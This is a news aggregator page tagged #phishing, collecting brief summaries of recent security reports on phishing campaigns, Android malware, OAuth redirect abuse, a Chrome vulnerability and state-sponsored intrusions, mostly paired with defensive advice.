All articles tagged with #phishing
Microsoft (MSFT) shares edged higher after TipRanks reported a new EvilTokens phishing campaign targeting Microsoft businesses, with recommended protections like limiting device-code flows and strengthening anti-ph phishing policies; the piece also notes Xbox sales in February (34.4M units) versus Sony’s PlayStation 5 (about 91M) and cites a Strong Buy consensus with a $581.61 price target, implying roughly 54% upside.
The NFL Players Association alerted certified agents that NFL and NBA players may have been targeted by a fraud and sex-trafficking scheme in which a man posing as an adult-film star phished players’ Apple iCloud accounts, stole credit-card information, and coerced a female victim into sex acts with athletes; the suspect, Kwamaine Jerell Ford, has been indicted on multiple counts, with prosecutors saying the operation began in 2020 while he was in federal custody. The NFLPA says all agents have a link to assess whether players were targeted and urges players to contact their agent or the NFLPA if they suspect victimization and to report to the FBI.
Security researchers warn of Perseus, a new Android banking malware evolved from Cerberus and Phoenix, distributed via phishing dropper apps and using Accessibility-based remote sessions to takeover devices. It performs overlay attacks, keystroke logging, and notably monitors note apps (Google Keep, Samsung Notes, Evernote, OneNote, etc.) to exfiltrate data, while allowing operators to issue remote commands through a C2 panel (examples include scan_notes, start_vnc, click_coord) and even stream the victim’s screen. Perseus also conducts anti-analysis checks and focuses on targets in Turkey, Italy and several European markets, highlighting a trend toward more adaptable, data-focused Android threats.
Unit 42 warns of a rising risk of wiper attacks tied to the Iran conflict, led by Handala Hack (aka Void Manticore) using phishing and compromised admin access via Microsoft Intune to disrupt networks in Israel and the US; Israel's National Cyber Directorate reports cases where attackers used legitimate credentials to delete servers. The advisory outlines zero trust privileged access, Just-In-Time admin rights, MFA, break-glass accounts, PIM/PAM, MAA, RBAC with Intune Admin roles, and Group-based PIM; plus shorter session lifetimes, token protection, DSPM/DLP, MDR/XDR monitoring, offline immutable backups, and ongoing phishing training. If compromised, contact incident response teams.
The FBI and FTC warn about unsolicited mystery packages that include QR codes leading recipients to fraudulent sites designed to steal personal and financial information. This dangerous twist on brushing scams targets people who scan codes without verification, risking identity and financial theft. Advice from authorities includes changing passwords, enabling two-factor authentication, checking credit reports, and reporting incidents to the FBI.
Microsoft's Threat Intelligence report finds threat actors are using generative AI to speed up and scale cyberattacks across the entire lifecycle—drafting phishing emails, creating malware, developing infrastructure, and fabricating realistic identities for remote‑worker schemes—while defenders should strengthen identity, detect credential abuse, and secure AI systems; the trend is echoed by Google and Amazon.
Microsoft Defender researchers warn attackers abuse OAuth 2.0 redirect flows to bypass phishing protections by registering malicious OAuth apps and directing users to attacker-controlled redirect URIs, sometimes via PDFs; victims are taken to phishing pages or intermediaries like EvilProxy that can intercept session cookies to bypass MFA. Other campaigns deliver ZIPs with LNK files that launch PowerShell and DLL side-loading to drop payloads. These are identity-based threats exploiting standard OAuth error handling; Microsoft advises tighter OAuth permissions, stronger identity protections, Conditional Access, and cross-domain detection across email, identity, and endpoints.
Researchers from Palo Alto Networks" Unit 42 disclosed a high-severity vulnerability (CVE-2026-0628) in Chrome's Gemini AI panel that could be exploited by a malicious extension to inject code with the panel’s elevated privileges, enabling silent camera and microphone access, local file theft, screenshots, and phishing. The flaw arises from how Chrome handles the declarativeNetRequest API for gemini.google.com; when loaded inside the Gemini panel it gains browser-level rights, unlike in a normal tab. Google patched the issue on January 5, 2026, so users should update Chrome immediately; organizations should apply the patch across endpoints to mitigate enterprise risk from trusted-panel attacks.
Microsoft warns of phishing campaigns that exploit OAuth redirect flows to bypass email and browser defenses, steering government and public-sector victims to attacker-controlled landing pages. Attackers use a malicious OAuth app with a redirect URL to rogue domains; victims authenticate, triggering ZIP-delivered payloads that execute PowerShell, DLL sideloading, and in-memory malware to reach a remote C2 server. Some campaigns also employ EvilProxy for credential interception. Defenders are advised to limit user consent, review app permissions, and remove unused or overprivileged apps.
A phishing campaign disguises a fake Google Security page as a Progressive Web App to trick users into granting permissions. The malicious PWA can exfiltrate one-time passwords, clipboard contents, contacts, and GPS data, and can proxy the victim’s browser traffic and scan internal networks via a WebSocket relay. An Android APK is also distributed to extend access with keystroke capture and device admin persistence. The attack relies on social engineering, not exploiting a vulnerability. Google says security checks aren’t done via pop-ups; remove the PWA and revoke device admin rights following Malwarebytes’ removal guidance.
Following Feb 28, 2026 U.S.–Israel strikes, Iran’s cyber posture shifts amid severe internet outages that likely constrain state-aligned actors, while hacktivist groups and other threat actors expand globally with low-to-medium impact activities (DDoS, data leaks, phishing). Unit 42 observes active phishing via a malicious Android app and notes a surge in cyber activism tied to an “Electronic Operations Room.” Defensive guidance emphasizes offline backups, out-of-band verification, patching internet-facing assets, phishing awareness, IP geofencing, and robust incident response; multi-layer defense and ongoing updates from cyber authorities are advised as activity remains fluid.
ThreatsDay flags AI-enhanced threats accelerating breaches and blurring into everyday activity: Kali Linux now integrates Claude via MCP for natural-language command execution; campaigns include Bitpanda phishing, four-minute lateral movement, and Mac/WinRAR exploits, aided by ad cloaking, typosquatting, and social engineering, as threat actors fragment post-RAMP and increasingly use AI-driven tactics.
Microsoft says an ongoing Exchange Online incident is caused by a new URL rule that erroneously flags legitimate messages as phishing and quarantines them, disrupting mail flow. The company is reviewing quarantined emails and working to unblock legitimate URLs, with some users potentially seeing previously flagged messages delivered as remediation proceeds; Microsoft has not provided scope or regional impact details yet.
A new open-source, cross-platform tool called Tirith hooks into major shells to inspect pasted commands for dangerous URLs and other homoglyph tricks, blocking execution locally with sub-millisecond overhead. It defends against homograph domains, terminal injections, pipe-to-shell patterns, dotfile hijacking, insecure transports, supply-chain risks, and credential exposure, while performing analysis offline and without telemetry. It supports Windows, Linux, and macOS and can be installed via Homebrew, apt/dnf, npm, Cargo, Nix, Scoop, Chocolatey, and Docker. It does not hook cmd.exe and has limited independent testing at publication.
A state-sponsored actor tracked as TGR-STA-1030/UNC6619, dubbed Shadow Campaigns, has compromised government and critical-infrastructure networks in 37 countries since early 2024, with reconnaissance activity touching 155 nations. The operation uses tailored phishing with a Diaoyu loader, exploits across multiple platforms, and a toolkit including Cobalt Strike, VShell, web shells, and a Linux kernel rootkit named ShadowGuard. It relies on legitimate VPS and proxy infrastructure and targets ministries, energy, finance, and diplomatic agencies, with activity intensifying around political events like elections. Unit 42 provides IoCs to help defenders detect and block these attacks.